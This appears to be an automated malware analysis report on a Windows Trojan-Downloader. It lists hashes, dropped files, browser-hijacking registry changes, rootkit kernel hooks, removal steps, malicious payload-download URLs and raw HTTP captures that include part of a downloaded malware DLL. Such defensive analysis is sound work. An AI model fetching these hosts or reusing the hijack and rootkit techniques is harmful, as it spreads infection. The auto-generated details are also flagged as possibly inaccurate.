Trojan-Downloader.Win32.Agent.wugyc (Kaspersky), Gen:Variant.Symmi.63061 (B) (Emsisoft), Gen:Variant.Symmi.63061 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 26b96d0c0c5ea406c4f7f669b991fa24
SHA1: b53554669699ffe1819559a822bb39e283e2a16d
SHA256: 30fce0cf5e6a216ab53bab53cff40aa92709e031002a9c770f94d83999e439aa
SSDeep: 12288:c8Y/YzlaWfBBr8shgrIx0ffUSZJ7ZLqppXUhttEwT9JPT7yx7B3b 9QoNEy:dmYzx8shgUxxkdt wTXTOx75b 9
Size: 850432 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2013-01-24 11:35:14
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
%original file name%.exe:1832
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hTnANms\EArNsVa.dll (13719 bytes)
C:\nwfvJhr.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (1778 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (2562 bytes)
%WinDir%\clog.txt (5020 bytes)
%WinDir%\MpvlIklT.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (4954 bytes)
C:\gyVLeno.bat (18 bytes)
C:\JOedQmjW.dll (3481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\desktop.ini (67 bytes)
%System%\74ec9\CDClient_EX.sys (108 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (18 bytes)
C:\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (4199 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%System%\CDCLOG.txt (87 bytes)
The Trojan deletes the following file(s):
%WinDir%\hTnANms\EArNsVa.dll (0 bytes)
C:\nwfvJhr.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (0 bytes)
%WinDir%\MpvlIklT.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (0 bytes)
C:\gyVLeno.bat (0 bytes)
C:\JOedQmjW.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (0 bytes)
%System%\74ec9\CDClient_EX.sys (0 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (0 bytes)
C:\498E9.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (0 bytes)
%System%\CDCLOG.txt (0 bytes)
Registry activity
The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"ImagePath" = "\DosDevices\%System%\74ec9\CDClient_EX.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"ErrorControl" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 7A 33 6D D8 F2 22 FB 9C D4 9D 17 00 60 4B 85"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Devname" = "R65SdhOzV1G"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Automatic startup of the following service is disabled:
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Start" = "3"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
a7593f0cb215231cd18877d846efeb59 | c:\JOedQmjW.dll |
9cd1bda903fa3c1447b98a6cc7b5a19d | c:\WINDOWS\hTnANms\EArNsVa.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:
ZwTerminateProcess
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\hTnANms\EArNsVa.dll (13719 bytes)
C:\nwfvJhr.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (1778 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (2562 bytes)
%WinDir%\clog.txt (5020 bytes)
%WinDir%\MpvlIklT.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (4954 bytes)
C:\gyVLeno.bat (18 bytes)
C:\JOedQmjW.dll (3481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\desktop.ini (67 bytes)
%System%\74ec9\CDClient_EX.sys (108 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (18 bytes)
C:\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (4199 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%System%\CDCLOG.txt (87 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 286720 | 112128 | 5.54409 | 9fa1ced2e0c24dca8d57485477d272da |
DATA | 290816 | 724992 | 720384 | 5.5448 | aa17a4970f6c4c80efb06e2e9a813f98 |
BSS | 1015808 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 1019904 | 8192 | 2048 | 5.03807 | 508e5b72d32a7f60ba2dc42f1968f594 |
.tls | 1028096 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1032192 | 4096 | 512 | 0.146134 | 1cd25dfa02f8cf7ef11eda7171df941f |
.reloc | 1036288 | 24576 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 1060864 | 20480 | 5120 | 4.80478 | 265b1cc001f314ba9cf6fd5e3a29b90b |
.aspack | 1081344 | 12288 | 9216 | 4.2544 | 88fe2fdbebfd3fad67f8a505549c3c47 |
.adata | 1093632 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.58sky.com/index/getcfg?id=1 | 119.97.143.41 |
hxxp://opt.ecoma.ourwebpic.com/d2/CDClient.dll | |
hxxp://opt.ecoma.ourwebpic.com/ | |
hxxp://opt.ecoma.ourwebpic.com/d2/x86.dll | |
hxxp://cdn.sp.cdntip.com/ic.asp | |
hxxp://175.haodns123.cc/ | |
hxxp://175.haodns123.cc/css/style.css | |
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js | |
hxxp://opt.ecoma.ourwebpic.com/ips1388.asp | |
hxxp://www.58sky.com/index/eventup.html | 119.97.143.41 |
hxxp://so.qh-lb.com/ | |
hxxp://www.haosou.com/ | 125.88.193.243 |
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js | 183.60.200.84 |
hxxp://www.ip138.com/ | 87.245.198.83 |
hxxp://www.go890.com/d2/CDClient.dll | 87.245.198.83 |
hxxp://www.ip138.com/ips1388.asp | 87.245.198.83 |
hxxp://cnwb.58ad.cn/index/eventup.html | 119.97.143.22 |
hxxp://www.go890.com/d2/x86.dll | 87.245.198.83 |
hxxp://www.175sf.com/ | 183.60.200.84 |
hxxp://1212.ip138.com/ic.asp | 42.236.95.18 |
hxxp://www.175sf.com/css/style.css | 183.60.200.84 |
www.so.com | 106.120.160.134 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /css/style.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:46:34 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 23 Jun 2016 10:01:38 GMT
Content-Encoding: gzip
b2a...............n......?..,.....(KZ.....Q.2.J...A...5%...^;.c..T....~@..gZ.y./....sf..(.:....`9.s.s...~.G....7...f.g.x52.g..,]..M|....^. ...]...x^..F.<...o.?Z.... {f.2NnG...}......'.....#.,:.../G.'&...;9.z.9:>._.LN..#c..".:^...-H.0.:y..l..$.W..,./r.\..y.TL&.L.G..-..QF.O.$.(..$.h.f~...8.W..$f....|".8).5.....t...q~..}...Vg..uR:62.....4.w%._B...T...k?....}.....K.M.../.9....o............[........m..jI...a.(..8...n,.To...|F.....(.....I.. ....q&._L..l".'..j. .L-"..2k..sW8@:i.#..W.,-T...:K>.v?'_...}.K.y.}....b..>..Ig`.o........q5........r.w........1;@f}...].0....95...V..`..Q...3.......yH.'.c.NNN.%.t..U....{tK.h:"..1.,..c"`o.EA...r.x..z..1...=U....i%:.p.3..3.1.9..n_.......w.?.n....V... 4....FZ....*Q......r...].g.$.2QZm......g..0.2..k ..s nn.$...S..[..f. ...fi^.T...B..(.$T.3\^ R..wq.....llE}..P..e.W...%._..D...cc.$...R... ..fd,.0.V.......#..w.&.z.`..G] . C.....{.`...G..9....p...r.x.h..N(....:..f.\...@.7..).D..F`#.........f.p....2L.Z.......J.......M.`[...2ZE7.e.d.v..r.. .... .....djV..rZ...=.......d........o?....~...Q..h.......C".=v.o.K...0.~.C(.L...B.......>Z..y'......Q..I.....=Y.J....(^....Uu'...02....\S!..C...Z.... S.~.=\....z.....A.n......S..H.u).L.k.P...<Hb.Y....|u..N..8.....0.\'n......oC`...(....H.l..s....q.[7.`...1t....4.....X.us..~.1...Z.....e...-^t.;.d....3...}F.6......., SPu.V.....e......@...8.r..es.z...*m....5.*.2...h........R.%.^.Zc....4;.=.\.AS..OE..J.;.}.,..YE$.;k.........@]G.i..Ptq...;M...#V.AS.......>;.....-b;....YDH.W.#".@/.w.A......8.a..zH....,(.. `{..E.9...(."...v..F.xW...r...^..
<<< skipped >>>
GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:46:35 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...>..._,..L.,.{....$r...2"...................o.-....E.\7...".........i.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1..........<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(......,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN..."<....OOq...U..XY.v.."..f.K..k...........B}.<?............`......`.9..Ho.....W.5&.w..A S~..........O..M....V....Z.....@.vQ.\..].\..#.,.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ......4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.mv...f5v...p.`....i..T......~..`0k..t...........5......S...`................t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h....q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U........@d.B...f\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3.4R. .c.&..]...o....T..... ..".8....p :.=.Z..b...@......O.f..:==Y...M....Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......
<<< skipped >>>
GET /ips1388.asp HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9659
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQRSQRR=CNIHBEKENOHNABNJLBGEEHLA; path=/
Cache-Control: private
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML>..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta http-equiv="mobile-agent" content="format=html5; url=hXXp://m.ip138.com/ip.html"/>..<TITLE>IP........--.................. | ............ | ............ | ........................</TITLE>..<META NAME="Generator" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Author" CONTENT="ip138,........">..<META NAME="Keywords" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Description" CONTENT="ip,IP....,IP........,ip138,........">..<SCRIPT LANGUAGE="JavaScript">..<!--..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(
<<< skipped >>>
GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Fri, 02 Sep 2016 17:46:49 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDACRTTRAB=JJNGNJJCFAFFBPMOMMGPILNC; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>..
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.haosou.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Fri, 02 Sep 2016 17:46:55 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 14:02:24 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 30 Aug 2016 05:59:59 GMT
Content-Type: application/octet-stream
Content-Length: 196608
Age: 1
X-Via: 1.1 jfzh181:7 (Cdn Cache Server V2.0), 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y...y..\yRich..\y........................PE..L......W...........!.........>.......@.......................................P............@..................................6..P.... .......................0..H....................................0..@...............@............................text............................... ..`.rdata..tM.......N..................@..@.data...l....@.......0..............@....rsrc........ ......................@..@.reloc..H....0......................@..B........................................................................................................................................................................................................................................................................................................................................U..j.hP1..h.i..d.....P...SVW..@..1E.3.P.E.d......e.3..u.d.0....E..u..E..x.......;.......f.y,.su.A0....nt...Nuf.P...tt...TuY.P...dt...DuL.P...lt...Lu?.P...lt...Lu2.x..u,.P...dt...Du..P...lt...Lu......<lt.<Lu..q......u..........e.3..u..E........M.d......Y_^[..].............U..j.hp1..h.i..d.....P...SVW..@..1E.3.P.E.d......e..E......MZ..f9.t..E.....2..M.d......Y_^[..]..A<...8PE..u............e.2..E..E......M.d......Y_^[..]..........U..j.h.1..h.i..d.....P...SVW..@..1E.3.P.E.d......e..E......u..I.N.u.
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:46:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Fri, 02 Sep 2016 14:14:48 GMT
Content-Encoding: gzip
3c74.............}.s[G...L...Xfg-.. .@.<......5;;...&.T...........l.d.U.a.RS......=8$.......x. .'%k$Y...,..4.h.R..\\.......@6.l.x........9}...?../>.....'..qR...7.....p.................o......\...z...6.uZ.fh.'.3..P..S...MOOs..\.~l....].{.pq..Ac..\.Q1p...;Uo...Fk8}.}..TJ]N}Y)S..I.Q..o.*....O.|....Z...g....9....Qy.8.W..#W........_@..8Cp....Q.).............E...i../..;...s...K...{~%.^t.....!..F...&O.Q7..ie....?S.L...C......7}..J.\...n9...Tsr...../..l... ..............R......s..[.w.OSK..I.R.o."S..s.k..dc........m.#2..4H.O9x^.W....7 .J..G.>.....D.j.Z;.Q...........8.Qr...8FRN..._........*......>....~.1..........:;~.......a..;..r..[..8.;/..y...u......)...;.......O...r...'......p.......~.$....?.... ..|....._Gt..x....].V....B.>..kd.r..uS...I......LP...>1@>.......O.Gh......Q...IR..i=...&-I\....;?.|..R H.(.....~B..MQ.5nK....qtP2@..1.g....:...Cr....T....2.\5$.R... .....&.".PJH..pX....wNr.....S..Qy....~.|}B......|.!9R.tZ...i.V...jt.y.@....F.....*.\....*.9?&ox...@..?.o.?6...../.9y..........dW......c:..0..2.._...*.T...>IL.~.:...F..h...nT.......'...VO....!.....9>..@..&T.o.O.l../......o.m.}..&M.7.w...2...Q....v...v..F.|.[}....).....[.....3..T.n.......8.Km.V......b!....-n.H..B..m..7......7.9.{)Z...q&xU........3Q8....nD.[o...P.V.3...J(~-.z...#..s....GgA...2.zL{z@N....|...Ipc&r....~.a%.O..s...p..L..8..`<..|B4.6.F4J..ZaT.. H.3..!m.......\....dr.vl...L.h.n.BOw.Q.w'B:p......%..K..i.(./....c/[\$..vQx1......~...k6nF..._...v.u....K_o..w8..../...... r..P.....k._.u.R...#....n.....*..!..G...E.cg.......}...jI....
<<< skipped >>>
GET /index/getcfg?id=1 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Fri, 02 Sep 2016 17:46:36 GMT
Content-Type: text/html;charset=utf-8
